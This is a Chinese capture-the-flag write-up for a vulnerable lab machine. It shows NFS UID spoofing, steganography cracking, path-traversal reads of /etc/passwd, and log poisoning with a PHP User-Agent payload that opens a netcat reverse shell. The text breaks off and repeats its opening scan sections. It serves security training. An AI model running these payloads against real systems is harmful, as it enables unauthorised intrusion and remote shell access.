![\"image-20240403123736335\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502128.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:80\nOpen 172.20.10.4:111\nOpen 172.20.10.4:139\nOpen 172.20.10.4:445\nOpen 172.20.10.4:2049\nOpen 172.20.10.4:36991\nOpen 172.20.10.4:42969\nOpen 172.20.10.4:43405\nOpen 172.20.10.4:47173\nOpen 172.20.10.4:51017\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100003 3,4 2049\/tcp nfs\n| 100003 3,4 2049\/tcp6 nfs\n| 100005 1,2,3 42969\/tcp mountd\n| 100005 1,2,3 47173\/udp6 mountd\n| 100005 1,2,3 55329\/tcp6 mountd\n| 100005 1,2,3 56240\/udp mountd\n| 100021 1,3,4 40308\/udp6 nlockmgr\n| 100021 1,3,4 43405\/tcp nlockmgr\n| 100021 1,3,4 44207\/tcp6 nlockmgr\n| 100021 1,3,4 55257\/udp nlockmgr\n| 100024 1 33514\/udp status\n| 100024 1 36529\/tcp6 status\n| 100024 1 51017\/tcp status\n| 100024 1 54890\/udp6 status\n| 100227 3 2049\/tcp nfs_acl\n|_ 100227 3 2049\/tcp6 nfs_acl\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n2049\/tcp open nfs_acl syn-ack 3 (RPC #100227)\n36991\/tcp open mountd syn-ack 1-3 (RPC #100005)\n42969\/tcp open mountd syn-ack 1-3 (RPC #100005)\n43405\/tcp open nlockmgr syn-ack 1-4 (RPC #100021)\n47173\/tcp open mountd syn-ack 1-3 (RPC #100005)\n51017\/tcp open status syn-ack 1 (RPC #100024)\n\nHost script results:\n| smb2-time: \n| date: 2024-04-03T04:39:19\n|_ start_date: N\/A\n|_clock-skew: -1s\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 45452\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 15726\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 7756\/udp): CLEAN (Failed to receive data)\n| Check 4 (port 59594\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\u5565\u90fd\u6ca1\u626b\u51fa\u6765\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240403124205383\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u53ef\u80fd\u9700\u8981\u8fdb\u884cdns\u89e3\u6790\uff0c\u5148\u6401\u7f6e\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-03 00:40:18 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.22.1\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time: 2024-04-03 00:40:32 (GMT-4) (14 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u7aef\u53e3<\/h3>\nSMB<\/h4>\n
\u53d1\u73b0\u5f00\u542f\u4e86smb\u670d\u52a1\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n
smbmap -H 172.20.10.4 <\/code><\/pre>\n[+] IP: 172.20.10.4:445 Name: 172.20.10.4 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n public READ ONLY New Jerusalem Public\n hermanubis NO ACCESS Hermanubis share\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n\u6709\u4e00\u4e2a\u53ea\u8bfb\u6587\u4ef6\uff0c\u770b\u770b\uff1a<\/p>\n
smbclient \/\/172.20.10.4\/public<\/code><\/pre>\nsmb: \\> ls\n . D 0 Tue Nov 28 06:57:45 2023\n .. D 0 Sat Nov 25 11:19:40 2023\n new_era.txt N 158 Sun Nov 19 07:01:00 2023\n straton.txt N 718 Sun Nov 19 07:00:24 2023\n loyalty.txt N 931 Sun Nov 19 07:01:07 2023\n\n 19962704 blocks of size 1024. 17193612 blocks available\nsmb: \\> get new_era.txt \ngetting file \\new_era.txt of size 158 as new_era.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\> get straton.txt \ngetting file \\straton.txt of size 718 as straton.txt (6.7 KiloBytes\/sec) (average 4.2 KiloBytes\/sec)\nsmb: \\> get loyalty.txt \ngetting file \\loyalty.txt of size 931 as loyalty.txt (303.1 KiloBytes\/sec) (average 8.5 KiloBytes\/sec)\nsmb: \\> pwd\nCurrent directory is \\\\172.20.10.4\\public\\<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u6587\u4ef6\u7684\u4fe1\u606f\uff1a<\/p>\n
# loyalty.txt\nThis text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452).\n\nWhat I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility.\n\n2257686f2061726520796f752c207468656e3f22\n\nTo put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril.\n\n# cat new_era.txt \nYesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password.\n\n# cat straton.txt\nThis fragment from Straton's On the Universe appears to have been of great significance both to the Progenitor and to the Founder.\n\nAMYNTAS: But what does this tell us about the nature of the universe, which is what we were discussing?\nSTRATON: That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact?<\/code><\/pre>\n\u9664\u4e86\u90a3\u4e00\u4e32\u5b57\u7b26\uff0c\u4f3c\u4e4e\u5bf9\u6211\u4eec\u7684\u6253\u9776\u6ca1\u6709\u5565\u7528\u5904\uff0c\u57fa\u672c\u90fd\u662f\u54f2\u5b66\u89c2\u5ff5\uff0c\u4e0d\u8fc7\u5148\u8bb0\u4f4f\u4ed6\u4eec\u5927\u6982\u8bf4\u7684\u662f\u5565\u5427\u3002<\/p>\n
NFS<\/h4>\n
\u53ef\u4ee5\u770b\u5230\u8fd8\u5f00\u542f\u4e86NFS\u670d\u52a1\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
showmount -e 172.20.10.4\n\nExport list for 172.20.10.4:\n\/var\/backups *\n\/home\/byron *<\/code><\/pre>\n\u521b\u5efa\u4e24\u4e2a\u6587\u4ef6\u5939\uff0c\u7136\u540e\u6302\u8f7d\u5230\u672c\u5730\uff1a<\/p>\n
mount -t nfs 172.20.10.4:\/var\/backups \/home\/kali\/temp\/principle2\/backups\nmount -t nfs 172.20.10.4:\/home\/byron \/home\/kali\/temp\/principle2\/byron<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
chmod: changing permissions of 'backups': Read-only file system\ncd: permission denied: backups<\/code><\/pre>\n# mayor.txt \nNow that I am mayor, I think Hermanubis is conspiring against me, I guess he has a secret group and is hiding it.\n# memory.txt \nHermanubis told me that he lost his password and couldn't change it, thank goodness I keep a record of each neighbor with their number and password in hexadecimal. I think he would be a good mayor of the New Jerusalem.<\/code><\/pre>\n\u4f7f\u752816\u8fdb\u5236\u52a0\u5bc6\u4e86\u5bc6\u7801\uff0c\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e24\u4e2a\u6587\u4ef6\u6240\u6709\u8005\u7684UID\uff1a<\/p>\n
ls -la\ntotal 44\ndrwxr-xr-x 4 kali kali 4096 Apr 3 01:01 .\ndrwxr-xr-x 11 kali kali 4096 Apr 3 00:56 ..\ndrwxr--r-- 2 54 backup 28672 Nov 28 19:00 backups\ndrwxr-xr-x 3 1001 1001 4096 Nov 25 12:33 byron<\/code><\/pre>\n\u521b\u5efa\u5177\u6709\u76f8\u540cUID\u7684\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
useradd -u 54 hack\nuseradd warning: hack's uid 54 outside of the UID_MIN 1000 and UID_MAX 60000 range.<\/code><\/pre>\n\u5207\u6362\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
su hack\nbash\ncd backups\nls<\/code><\/pre>\n<\/div><\/p>\n\u6211\u64e6\uff0c\u770b\u4e00\u4e0b\u5185\u5bb9\uff1a<\/p>\n
<\/div><\/p>\n\u679c\u7136\u90fd\u662f\u5341\u516d\u8fdb\u5236\u7684\u5185\u5bb9\uff0c\u8f93\u5165\u5230\u4e00\u4e2a\u6587\u4ef6\u4e2d\u65b9\u4fbf\u6211\u4eec\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
cat *.txt >> \/tmp\/hex.txt\nsu kali\nmv \/tmp\/hex.txt \/home\/kali\/temp\/principle2\/hex.txt<\/code><\/pre>\n\u5c1d\u8bd5\u7834\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
while read line; do echo "$line" | xxd -ps -r | strings; done < hex.txt<\/code><\/pre>\n\u8fd9\u4e9b\u884c\u5927\u591a\u6570\u662f\u65e0\u610f\u4e49\u7684\uff0c\u53ea\u6709\u4e00\u4e2a\uff1a<\/p>\n
.......\nByronIsAsshole\n.......<\/code><\/pre>\n\u8fd9\u5c31\u662f\u5bc6\u7801\u4e86\uff0c\u53ef\u60dc\u6ca1\u6709\u5f00\u653e22\u7aef\u53e3\uff0c\u4e0d\u7136\u76f4\u63a5ssh\u8fde\u63a5\u4e86\uff0c\u91cd\u65b0\u8fde\u63a5smb\u670d\u52a1\uff1a<\/p>\n
smbmap -H 172.20.10.4 -u hermanubis -p ByronIsAsshole<\/code><\/pre>\n[+] IP: 172.20.10.4:445 Name: 172.20.10.4 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n public READ ONLY New Jerusalem Public\n hermanubis READ ONLY Hermanubis share\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n
smbclient \/\/172.20.10.4\/hermanubis -U hermanubis\nPassword for [WORKGROUP\\hermanubis]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Tue Nov 28 09:44:44 2023\n .. D 0 Tue Nov 28 20:13:50 2023\n index.html N 346 Tue Nov 28 09:44:41 2023\n prometheus.jpg N 307344 Tue Nov 28 12:23:24 2023\n\n 19962704 blocks of size 1024. 17193608 blocks available\nsmb: \\> get index.html \ngetting file \\index.html of size 346 as index.html (13.0 KiloBytes\/sec) (average 13.0 KiloBytes\/sec)\nsmb: \\> get prometheus.jpg \ngetting file \\prometheus.jpg of size 307344 as prometheus.jpg (10719.3 KiloBytes\/sec) (average 5564.4 KiloBytes\/sec)<\/code><\/pre>\n\u7206\u7834\u9690\u85cf\u5185\u5bb9<\/h4>\n
\u770b\u770b\u4ec0\u4e48\u9b3c\uff1a<\/p>\n
<!DOCTYPE html>\n<html lang="es">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Welcome to the resistance forum<\/title>\n<\/head>\n<body>\n <h1>Welcome to the resistance forum<\/h1>\n <p>free our chains!<\/p>\n <img src="prometheus.jpg" alt="chained">\n<\/body>\n<\/html><\/code><\/pre>\n<\/div><\/p>\n\u62ff\u53bb\u770b\u770b\u6709\u6ca1\u6709\u5305\u542b\u5565\u6587\u4ef6\uff1a<\/p>\n
steghide extract -sf prometheus.jpg \nEnter passphrase: \nsteghide: could not extract any data with that passphrase!<\/code><\/pre>\n\u6709\u5bc6\u7801\u770b\u6765\u662f\u9700\u8981\u8fdb\u884c\u63d0\u53d6\u7684\u3002\u3002\u3002<\/p>\n
stegseek -wl \/usr\/share\/wordlists\/rockyou.txt prometheus.jpg<\/code><\/pre>\nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: "soldierofanubis" \n[i] Original filename: "secret.txt".\n[i] Extracting to "prometheus.jpg.out".<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cat prometheus.jpg.out \nI have set up a website to dismantle all the lies they tell us about the city: thetruthoftalos.hmv<\/code><\/pre>\n\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n# \/etc\/hosts\n172.20.10.4 thetruthoftalos.hmv<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ncurl http:\/\/thetruthoftalos.hmv\/\nNOTHING<\/code><\/pre>\n\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
dirsearch -u http:\/\/thetruthoftalos.hmv\/<\/code><\/pre>\n[01:47:04] 200 - 2KB - \/index.php\n[01:47:17] 403 - 555B - \/uploads\/\n[01:47:17] 301 - 169B - \/uploads -> http:\/\/thetruthoftalos.hmv\/uploads\/<\/code><\/pre>\nok\uff01\uff01\uff01\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nContent of ares.txt:\n\nRoman Name: Mars\n\nAres was the god of war. He was depicted as both cruel and a coward, but greatly feared among the Greek populace for his battle lust and violence. Despite his reputation for violence, Ares was not always respected by the other gods and was often the subject of ridicule and scorn. Ares was the son of Zeus and Hera, but neither of his parents liked him which often made him feel outcast by the Olympians, apart from Aphrodite, with whom he carried on a lengthy affair. His symbols include the vulture and the dog, and he often carried a bloody spear.<\/code><\/pre>\nContent of hermes.txt:\n\nRoman Name: Mercury\n\nHermes was the messenger of the gods, a trickster, and a friend to thieves. He was said to have invented boxing and gymnastics and was the son of Zeus and the constellation Maia. He was often depicted as a young man wearing a winged hat and sandals, and carrying a caduceus: a staff with two snakes coiled around it. Hermes was known for his quick wit, cunning, and ability to move swiftly between the mortal and divine worlds. He was also considered the messenger of the gods, and was responsible for delivering missives and guiding souls to the underworld. In addition, Hermes was associated with luck and good fortune, and was often invoked by merchants and traders for success in their endeavors. Hermes was also known to be one of the most mischievous of the gods, often playing tricks and pranks on other Olympians, demigods like Heracles, and the mere mortals of Greece.<\/code><\/pre>\n\u50cf\u662f\u4e00\u4e2a\u5bfc\u6e38\u9875\u9762\u4e00\u6837\u3002\u770b\u4e00\u4e0burl\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=hermes.txt<\/code><\/pre>\n\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=..\/..\/..\/..\/..\/..\/etc\/passwd\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u6210\u529f\u4e86\uff0c\u627e\u51fa\u4e86\u51e0\u4e2a\u7528\u6237\uff1a<\/p>\n
daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:54:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\ntalos:x:1000:1000:Talos,,,:\/home\/talos:\/bin\/bash\n_rpc:x:102:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:103:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\nbyron:x:1001:1001::\/home\/byron:\/bin\/sh\nhermanubis:x:1002:1002::\/home\/hermanubis:\/bin\/sh\nmelville:x:1003:1003::\/home\/melville:\/bin\/bash<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6709\u4e0a\u4f20\u70b9\uff0c\u627e\u4e00\u4e0b\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u884c\u65e5\u5fd7\u5305\u542bgetshell\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/apache\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/error.log<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u51fa\u73b0\u4ee5\u4e0b\u60c5\u51b5\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u4e09\u4e2a\u53ef\u4ee5\u8bfb\u53d6\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u6784\u9020payload\uff1a<\/p>\n
curl http:\/\/thetruthoftalos.hmv\/exploit -H "User-Agent: <?php exec('nc -e \/bin\/bash 172.20.10.8 1234') ?>"<\/code><\/pre>\n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body>\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.22.1<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
curl http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/\/var\/log\/nginx\/access.log<\/code><\/pre>\n<html>\n<head><title>504 Gateway Time-out<\/title><\/head>\n<body>\n<center><h1>504 Gateway Time-out<\/h1><\/center>\n<hr><center>nginx\/1.22.1<\/center>\n<\/body>\n<\/html><\/code><\/pre>\nshell\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u5207\u6362\u7528\u6237<\/h3>\n
\u8bb0\u5f97\u6211\u4eec\u4e4b\u524d\u770b\u5230\u7684\/etc\/passwd<\/code>\u4e86\u5417\uff0c\u6211\u4eec\u786e\u5b9e\u6709\u4e86\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\nhermanubis\nByronIsAsshole<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\uff1a<\/p>\n
(remote) hermanubis@principle2:\/home\/hermanubis$ whoami;id\nhermanubis\nuid=1002(hermanubis) gid=1002(hermanubis) groups=1002(hermanubis)\n(remote) hermanubis@principle2:\/home\/hermanubis$ ls -la\ntotal 32\ndrwx------ 3 hermanubis hermanubis 4096 Nov 29 01:13 .\ndrwxr-xr-x 7 root root 4096 Nov 25 16:19 ..\nlrwxrwxrwx 1 root root 9 Nov 25 17:34 .bash_history -> \/dev\/null\n-rwx------ 1 hermanubis hermanubis 220 Apr 23 2023 .bash_logout\n-rwx------ 1 hermanubis hermanubis 3526 Apr 23 2023 .bashrc\n-rwx------ 1 hermanubis hermanubis 264 Nov 23 21:18 investigation.txt\n-rwx------ 1 hermanubis hermanubis 807 Apr 23 2023 .profile\ndrwxr-x--- 2 hermanubis hermanubis 4096 Nov 28 14:44 share\n-rwx------ 1 hermanubis hermanubis 1080 Nov 25 17:29 user.txt\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat user.txt\n ...',;;:cccccccc:;,..\n ..,;:cccc::::ccccclloooolc;'.\n .',;:::;;;;:loodxk0kkxxkxxdocccc;;'..\n .,;;;,,;:coxldKNWWWMMMMWNNWWNNKkdolcccc:,.\n .',;;,',;lxo:...dXWMMMMMMMMNkloOXNNNX0koc:coo;.\n ..,;:;,,,:ldl' .kWMMMWXXNWMMMMXd..':d0XWWN0d:;lkd,\n ..,;;,,'':loc. lKMMMNl. .c0KNWNK: ..';lx00X0l,cxo,.\n ..''....'cooc. c0NMMX; .l0XWN0; ,ddx00occl:.\n ..'.. .':odc. .x0KKKkolcld000xc. .cxxxkkdl:,..\n ..''.. ;dxolc;' .lxx000kkxx00kc. .;looolllol:'..\n ..'.. .':lloolc:,.. 'lxkkkkk0kd, ..':clc:::;,,;:;,'..\n ...... ....',;;;:ccc::;;,''',:loddol:,,;:clllolc:;;,'........\n . ....'''',,,;;:cccccclllloooollllccc:c:::;,'..\n .......'',,,,,,,,;;::::ccccc::::;;;,,''...\n ...............''',,,;;;,,''''''......\n ............................\n\nCONGRATULATIONS!\n\nThe flag is:\n&5Wvtd!84S6JSMeH\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat investigation.txt \nI am aware that Byron hates me... especially since I lost my password.\nMy friends along with myself after several analyses and attacks, we have detected that Melville is using a 32 character password....\nWhat he doesn't know is that it is in the Byron database...<\/code><\/pre>\n\u7206\u7834\u7528\u6237Melville<\/h3>\n
\u53c8\u51fa\u73b0\u4e86\u6211\u4eec\u4e4b\u524d\u53d1\u73b0\u7684\u90a3\u4e2a\u5bc6\u7801\u672c\u7684\u5185\u5bb9\uff0c\u4f7f\u7528\u5de5\u5177\u8fdb\u884csu\u7206\u7834\uff1a<\/p>\n
\n
rustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:80\nOpen 172.20.10.4:111\nOpen 172.20.10.4:139\nOpen 172.20.10.4:445\nOpen 172.20.10.4:2049\nOpen 172.20.10.4:36991\nOpen 172.20.10.4:42969\nOpen 172.20.10.4:43405\nOpen 172.20.10.4:47173\nOpen 172.20.10.4:51017\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100003 3,4 2049\/tcp nfs\n| 100003 3,4 2049\/tcp6 nfs\n| 100005 1,2,3 42969\/tcp mountd\n| 100005 1,2,3 47173\/udp6 mountd\n| 100005 1,2,3 55329\/tcp6 mountd\n| 100005 1,2,3 56240\/udp mountd\n| 100021 1,3,4 40308\/udp6 nlockmgr\n| 100021 1,3,4 43405\/tcp nlockmgr\n| 100021 1,3,4 44207\/tcp6 nlockmgr\n| 100021 1,3,4 55257\/udp nlockmgr\n| 100024 1 33514\/udp status\n| 100024 1 36529\/tcp6 status\n| 100024 1 51017\/tcp status\n| 100024 1 54890\/udp6 status\n| 100227 3 2049\/tcp nfs_acl\n|_ 100227 3 2049\/tcp6 nfs_acl\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n2049\/tcp open nfs_acl syn-ack 3 (RPC #100227)\n36991\/tcp open mountd syn-ack 1-3 (RPC #100005)\n42969\/tcp open mountd syn-ack 1-3 (RPC #100005)\n43405\/tcp open nlockmgr syn-ack 1-4 (RPC #100021)\n47173\/tcp open mountd syn-ack 1-3 (RPC #100005)\n51017\/tcp open status syn-ack 1 (RPC #100024)\n\nHost script results:\n| smb2-time: \n| date: 2024-04-03T04:39:19\n|_ start_date: N\/A\n|_clock-skew: -1s\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 45452\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 15726\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 7756\/udp): CLEAN (Failed to receive data)\n| Check 4 (port 59594\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\u5565\u90fd\u6ca1\u626b\u51fa\u6765\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u53ef\u80fd\u9700\u8981\u8fdb\u884cdns\u89e3\u6790\uff0c\u5148\u6401\u7f6e\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-03 00:40:18 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.22.1\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time: 2024-04-03 00:40:32 (GMT-4) (14 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u7aef\u53e3<\/h3>\nSMB<\/h4>\n
\u53d1\u73b0\u5f00\u542f\u4e86smb\u670d\u52a1\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n
smbmap -H 172.20.10.4 <\/code><\/pre>\n[+] IP: 172.20.10.4:445 Name: 172.20.10.4 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n public READ ONLY New Jerusalem Public\n hermanubis NO ACCESS Hermanubis share\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n\u6709\u4e00\u4e2a\u53ea\u8bfb\u6587\u4ef6\uff0c\u770b\u770b\uff1a<\/p>\n
